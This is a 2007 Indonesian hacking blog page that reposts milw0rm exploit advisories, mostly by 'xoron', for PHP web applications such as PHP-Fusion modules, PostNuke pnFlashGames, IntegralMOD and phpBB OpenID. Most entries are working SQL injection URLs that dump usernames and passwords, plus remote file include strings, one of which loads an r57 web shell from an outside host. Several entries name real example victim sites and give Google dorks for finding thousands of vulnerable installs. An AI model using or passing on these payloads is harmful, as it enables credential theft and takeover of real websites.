Tips & Trik Komputer

Sabtu, 20 Oktober 2007

Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerabilities

======================X=O=R=O=N=====================
+
+ Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerabilities
+
======================X=O=R=O=N=====================
+
+ Bulan: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ kommentare.php?dlid=-1/**/UNION/**/SELECT/**/null,null,null,name,null,PASSWORD,null/**/FROM/**/user/*
+
======================X=O=R=O=N=====================
+
+ Vendor site: http://www.thecreativeheads.de/CreativeFiles/downloads.php
+
======================X=O=R=O=N=====================
+
+ Thnx: pang0, unique
+
======================X=O=R=O=N=====================

# milw0rm.com [2007-03-16]

PHPBB Minerva Mod <= 2.0.21 build 238a (forum.php) Remote SQL Injection Exploit

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln

--------------------------------

PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln

--------------------------------

Bulan: xoron

xoron.biz

--------------------------------

Exploit:

index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*

--------------------------------

Exapmle: http://www.basicwallpapers.dk/infusions/arcade/

--------------------------------

Google Dork:
/infusions/arcade/ 18.000 sites:)

--------------------------------

Ekin0x / --> evilc0der.org <--

--------------------------------

# milw0rm.com [2007-04-02]

PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln

--------------------------------

PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln

--------------------------------

Bulan: xoron - unique

xoron.biz

--------------------------------

Exploit:

index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*

--------------------------------

Exapmle: http://www.321spil.dk/infusions/topliste/

--------------------------------

Google Dork:
infusions/topliste/ 990 sites:)

--------------------------------

Ekin0x / --> evilc0der.org <--

--------------------------------

# milw0rm.com [2007-04-02]

PostNuke pnFlashGames Module v1.5 REmote SQL Injection

============================================================

PostNuke pnFlashGames Module v1.5 REmote SQL Injection

============================================================

Bulan: xoron


xoron.biz

+

Love's the funeral of hearts

The funeral of hearts
And a plea for mercy
When love is a gun
Separating me from you

:(

============================================================

Exploit:
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*

============================================================

Example: http://andersonvision.com/PostNuke/
============================================================

# milw0rm.com [2007-04-28]

IntegralMOD

------------------------

Found: xoron

------------------------

Vendor: http://www.integramod.nl/forum/portal.php

Download: http://sourceforge.net/project/showfiles.php?group_id=191355

------------------------
Exploit:

includes/archive/archive_topic.php?phpbb_root_path=http://meto5757.by.ru/shells/r57.txt?

------------------------

Kral kraldır!

------------------------

# milw0rm.com [2007-09-27]

phpBB Openid 0.2.0 Remote File Include

============================================
= =
= XORON (c) 2007 =
= =
============================================
= =
= phpBB Openid 0.2.0 Remote File Include =
= =
============================================
=
= Download:
= http://sourceforge.net/project/showfiles.php?group_id=178846
=
============================================
=
= Exploit:
= /includes/openid/Auth/OpenID/BBStore.php?openid_root_path=shell?
=
============================================
= =
= Special thanks "k1tkat" :) =
= =
============================================

# milw0rm.com [2007-09-30]

Mengenai Saya

In Your Mind, In Your Mind, Indonesia
Tidak gampang ngaku hacker!!!!